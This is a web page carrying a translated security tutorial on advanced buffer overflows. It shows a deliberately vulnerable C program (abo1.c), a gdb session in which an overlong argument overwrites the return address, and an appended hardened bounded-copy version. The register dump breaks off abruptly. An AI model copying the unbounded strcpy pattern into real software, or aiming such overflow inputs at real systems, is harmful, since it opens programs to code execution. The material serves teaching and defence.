<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html><head><title>Insecure Programming by Example: Advanced Buffer Overflows (version 1.2)</title><meta http-equiv="Content-Type" content="text/html; charset=gb2312"><meta name="Keywords" content="安全焦点, xfocus, 陷阱网络, honeynet, honeypot, 调查取证, forensic, 入侵检测, intrusion detection, 无线安全, wireless security, 安全论坛, security forums, 安全工具, security tools, 攻击程序, exploits, 安全公告, security advisories, 安全漏洞, security vulnerabilities, 安全教程, security tutorials, 安全培训, security training, 安全帮助, security help, 安全标准, security standards, 安全代码, security code, 安全资源, security resources, 安全编程, security programming, 加密, cryptography," /><link rel="stylesheet" href="../../css/plone.css" type="text/css"></head><body bgcolor="#FFFFFF" text="#000000"><table 
class="columns"> <tr> <td class="main"> <h1>Insecure Programming by Example: Advanced Buffer Overflows (version 1.2)</h1><br>Created: 2002-12-19<br>Article type: translation<br>Source: <a href='http://packetstormsecurity.nl/papers/general/core_vulnerabilities.pdf' target='_blank'>http://packetstormsecurity.nl/papers/general/core_vulnerabilities.pdf</a><br>Submitted by: <a href='https://www.xfocus.net/bbs/index.php?lang=cn&act=Profile&do=03&MID=24419'>Ph4nt0m</a> (axis_at_ph4nt0m.net)<br><br>Title: Insecure Programming by Example: Advanced Buffer Overflows<br />
Version: 1.2<br />
Updated: 2002.12.13<br />
Copyright: <a href='http://www.code-sec.com' target='_blank'>http://www.code-sec.com</a><br />
Translated and compiled by 刺 (ph4nt0m), cloie<br />
Source: 幻影旅团 translation group <a href='http://www.3389.net/bbs' target='_blank'>http://www.3389.net/bbs</a><br />
<br />
Translator's note: This article is an updated version of "Insecure Programming by Example: Advanced", previously translated by alert7, with much of the author's analysis added. The original authors are the Core Security team. We have tried to render the author's meaning as faithfully as possible; corrections of any shortcomings or errors from more experienced readers are welcome. During the translation we thank hellguard of 水木, warning3 of 绿盟 (NSFocus), and our friend d0nNy for their guidance.<br />
<br />
Contents<br />
<br />
Introduction<br />
Analysis of Advanced Buffer Overflow 1<br />
Analysis of Advanced Buffer Overflow 2<br />
Analysis of Advanced Buffer Overflow 3<br />
Analysis of Advanced Buffer Overflow 4<br />
Analysis of Advanced Buffer Overflow 5<br />
Analysis of Advanced Buffer Overflow 6<br />
Analysis of Advanced Buffer Overflow 7<br />
Analysis of Advanced Buffer Overflow 8<br />
Analysis of Advanced Buffer Overflow 9<br />
Analysis of Advanced Buffer Overflow 10<br />
<br />
<br />
Introduction<br />
In this paper Core Security analyses some of the most common mistakes programmers make when writing C. The subject is Advanced Buffer Overflows (ABO), illustrated with ten concrete examples (written by gera). We will point out the details of the weak spots in these programs, explain why these mistakes are dangerous, and provide the corresponding exploits. All tests were carried out on a Linux Slackware 8.0 server (IA32) with GNU GCC 2.95.3.<br />
We assume the reader is proficient in C programming and knows the basic principles of heap and stack overflows, the GOT, and so on. This paper provides no background on those topics; if you are unfamiliar with them, please read the references at the end of the paper.<br />
Updates to this paper can be obtained from <a href='http://www.core-sec.com' target='_blank'>www.core-sec.com</a>; for any questions contact us at info@core-sec.com<br />
<br />
<br />
Analysis of Advanced Buffer Overflow 1<br />
Source code:<br />
/* abo1.c *<br />
 * specially crafted to feed your brain by gera@core-sdi.com */<br />
/* Dumb example to let you get introduced... */<br />
<br />
#include &lt;string.h&gt; /* declares strcpy(); the original listing omits this include */<br />
<br />
/* Note: the original names the parameters (argv, argc) the opposite way round from the usual<br />
   convention, so argc[1] here is the first command-line argument. */<br />
int main(int argv, char **argc)<br />
{<br />
    char buf[256];<br />
    strcpy(buf, argc[1]); /* unbounded copy into a 256-byte stack buffer: the bug under analysis */<br />
}<br />
<br />
This is a very classic stack overflow; we will analyse it with the debugger.<br />
user@CoreLabs:~/gera$ gcc abo1.c -o abo1 -ggdb<br />
user@CoreLabs:~/gera$ gdb ./abo1<br />
GNU gdb 5.0<br />
..........<br />
This GDB was configured as "i386-slackware-linux"...<br />
(gdb) r `perl -e 'printf "A" x 264'`<br />
Starting program: /home/user/gera/abo1 `perl -e 'printf "A" x 264'`<br />
Program received signal SIGSEGV, Segmentation fault.<br />
0x41414141 in ?? ()<br />
(gdb) i r<br />
eax 0xbffff7ec -1073743892<br />
ecx 0xfffffd7c -644<br />
edx 0xbffffb78 -1073742984<br />
ebx 0x4012ba58 1074969176<br />
esp 0xbffff8f4 0xbffff8f4<br />
ebp 0x41414141 0x41414141<br />
esi 0x40015d64 1073831268<br />
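The crash above comes from copying 264 bytes into a 256-byte stack buffer. The following is an added example, not code from the paper or from gera's abo1.c: it places the bounded replacement a defender would write next to the original pattern, and reproduces the paper's experiment (an argument of 264 'A' bytes, constructed inline) to show the long input is rejected instead of overwriting the saved frame pointer and return address. The function names copy_bounded, accepts_input_of_length and roundtrip_ok are this example's own.<br />

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define BUF_SIZE 256   /* same buffer size as abo1.c */

/* Hardened counterpart of abo1's strcpy(buf, argc[1]) (name is this example's own).
 * Copies src into dst only if src plus its NUL terminator fits in dst_size bytes.
 * Returns 0 on success (dst is NUL-terminated), -1 if the copy would overflow.
 * The length scan itself is bounded, so an unterminated src is never read past dst_size. */
int copy_bounded(char *dst, size_t dst_size, const char *src)
{
    if (dst == NULL || src == NULL || dst_size == 0)
        return -1;

    size_t len = 0;
    while (len < dst_size && src[len] != '\0')
        len++;
    if (len >= dst_size)      /* no room left for the terminator */
        return -1;

    memcpy(dst, src, len + 1);
    return 0;
}

/* Mirrors the paper's gdb run: build an argument of n 'A' bytes (constructed
 * input, the equivalent of `perl -e 'printf "A" x n'`) and report whether the
 * bounded copy accepts it. Returns 1 if accepted, 0 if rejected. */
int accepts_input_of_length(size_t n)
{
    char *input = malloc(n + 1);
    if (input == NULL)
        return 0;
    memset(input, 'A', n);
    input[n] = '\0';

    char buf[BUF_SIZE];
    int rc = copy_bounded(buf, sizeof buf, input);
    free(input);
    return rc == 0;
}

/* Sanity check on an 8-byte destination: content survives the copy, 7 chars fit,
 * 8 chars (no room for the terminator) are refused. Returns 1 when all hold. */
int roundtrip_ok(void)
{
    char out[8];
    if (copy_bounded(out, sizeof out, "abc") != 0) return 0;
    if (strcmp(out, "abc") != 0) return 0;
    if (copy_bounded(out, sizeof out, "1234567") != 0) return 0;
    if (copy_bounded(out, sizeof out, "12345678") != -1) return 0;
    return 1;
}

/* Same shape as abo1.c, with the unbounded copy replaced by the bounded one. */
int main(int argc, char **argv)
{
    char buf[BUF_SIZE];
    if (argc < 2) {
        fprintf(stderr, "usage: %s <string>\n", argv[0]);
        return 1;
    }
    if (copy_bounded(buf, sizeof buf, argv[1]) != 0) {
        fprintf(stderr, "input too long (max %d bytes)\n", BUF_SIZE - 1);
        return 1;
    }
    printf("copied %zu bytes\n", strlen(buf));
    return 0;
}
```

Run with the paper's input, `./a.out "$(perl -e 'printf "A" x 264')"`, and the program exits with an error instead of a SIGSEGV at 0x41414141. The check compares against the destination size, not the source length, which is the invariant strcpy cannot enforce because it never sees the destination's size. Compiler hardening such as a stack protector adds a detection layer on top, but it turns the overwrite into an abort rather than preventing it; the length check is what removes the bug.<br />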